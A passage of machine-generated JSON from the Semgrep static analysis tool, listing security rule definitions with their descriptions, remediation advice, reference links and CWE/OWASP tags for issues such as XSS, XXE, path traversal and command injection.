(HSM)."},"helpUri":"https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","id":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","name":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","id":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","name":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"help":{"markdown":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path)\n - [https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/](https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/)\n","text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","id":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","name":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","id":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","name":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask","id":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","name":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-shelve-flask.tainted-shelve-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"help":{"markdown":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions](https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions)\n","text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","id":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","name":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"helpUri":"https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","id":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","name":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.nosql-injection-servlets.nosql-injection-servlets"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","id":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","name":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"help":{"markdown":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag)\n - [https://www.php.net/manual/en/language.basic-syntax.phptags.php](https://www.php.net/manual/en/language.basic-syntax.phptags.php)\n","text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input. In PHP you can encode or sanitize user input with `htmlspecialchars` or use automatic context-aware escaping with a template engine such as Latte."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","id":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","name":"php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-unsafe-echo-tag.taint-unsafe-echo-tag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"help":{"markdown":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization)\n - [https://github.com/mgholam/fastJSON#security-warning-update](https://github.com/mgholam/fastJSON#security-warning-update)\n","text":"$type extension has the potential to be unsafe, so use it with common sense and known json sources and not public facing ones to be safe"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","id":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","name":"csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.fast-json.insecure-fastjson-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module](https://docs.python.org/3/library/subprocess.html#using-the-subprocess-module)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. Untrusted input in a command can lead to command injection, allowing attackers to execute arbitrary commands and gain control of the system. To prevent this: 1. Avoid direct command execution: Don't run OS commands with user input directly. 2. Validate and sanitize input: Ensure input is safe by removing or escaping dangerous characters. 3. (preferred) Use safe methods: Use `subprocess.run` without `shell=True` to safely execute commands, as it doesn't call a system shell by default. If `shell=True` is necessary, properly quote and escape all input to prevent shell injection. This is a secure by default approach."},"helpUri":"https://semgrep.dev/r/python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","id":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","name":"python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.os.tainted-os-command-stdlib-fastapi-secure-default.tainted-os-command-stdlib-fastapi-secure-default"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Found dynamic content used for the external process. This is dangerous if arbitrary data can reach this function call because it allows a malicious actor to execute commands. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","id":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","name":"scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.lang.security.audit.dangerous-shell-run.dangerous-shell-run"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSL verification disabled, this allows for MitM attacks"},"help":{"markdown":"SSL verification disabled, this allows for MitM attacks\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none)\n - [https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify](https://docs.rs/openssl/latest/openssl/ssl/struct.SslContextBuilder.html#method.set_verify)\n","text":"SSL verification disabled, this allows for MitM attacks"},"helpUri":"https://semgrep.dev/r/rust.lang.security.ssl-verify-none.ssl-verify-none","id":"rust.lang.security.ssl-verify-none.ssl-verify-none","name":"rust.lang.security.ssl-verify-none.ssl-verify-none","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.ssl-verify-none.ssl-verify-none"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"help":{"markdown":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2)\n","text":"Found 'importlib.resources', which is a module only available on Python 3.7+. This does not work in lower versions, and therefore is not backwards compatible. Use importlib_resources instead for older Python versions."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-importlib2","id":"python.lang.compatibility.python37.python37-compatibility-importlib2","name":"python.lang.compatibility.python37.python37-compatibility-importlib2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-importlib2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The code must not contain any of Unicode Direction Control Characters"},"help":{"markdown":"The code must not contain any of Unicode Direction Control Characters\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters)\n - [https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo](https://entethalliance.org/specs/ethtrust-sl/v1/#req-1-unicode-bdo)\n","text":"The code must not contain any of Unicode Direction Control Characters"},"helpUri":"https://semgrep.dev/r/solidity.security.no-bidi-characters.no-bidi-characters","id":"solidity.security.no-bidi-characters.no-bidi-characters","name":"solidity.security.no-bidi-characters.no-bidi-characters","properties":{"precision":"very-high","tags":["CWE-837: Improper Enforcement of a Single, Unique Action","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.no-bidi-characters.no-bidi-characters"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"help":{"markdown":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal)\n - [https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af](https://medium.com/@emmapinheiro42/php-include-ignore-4a3ba81371af)\n - [https://www.acunetix.com/websitesecurity/php-security-2/](https://www.acunetix.com/websitesecurity/php-security-2/)\n","text":"Detected user input going into a php include or require command, which can lead to path traversal and sensitive data being exposed. These commands can also lead to code execution. Instead, allowlist files that the user can access or rigorously validate user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-path-traversal.tainted-path-traversal","id":"php.lang.security.tainted-path-traversal.tainted-path-traversal","name":"php.lang.security.tainted-path-traversal.tainted-path-traversal","properties":{"precision":"very-high","tags":["CWE-23: Relative Path Traversal","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-path-traversal.tainted-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"help":{"markdown":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#custom-algorithms)\n","text":"Cryptographic algorithms are notoriously difficult to get right. By implementing a custom message digest, you risk introducing security issues into your program. Use one of the many sound message digests already available to you: MessageDigest sha256Digest = MessageDigest.getInstance(\"SHA256\");"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","id":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","name":"java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.avoid-implementing-custom-digests.avoid-implementing-custom-digests"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"help":{"markdown":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/cross_site_scripting/index.markdown)\n - [https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/](https://www.netsparker.com/blog/web-security/preventing-xss-ruby-on-rails-web-applications/)\n","text":"'html_safe()' does not make the supplied string safe. 'html_safe()' bypasses HTML escaping. If external data can reach here, this exposes your application to cross-site scripting (XSS) attacks. Ensure no external data reaches here."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","id":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","name":"ruby.rails.security.audit.xss.avoid-html-safe.avoid-html-safe","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - 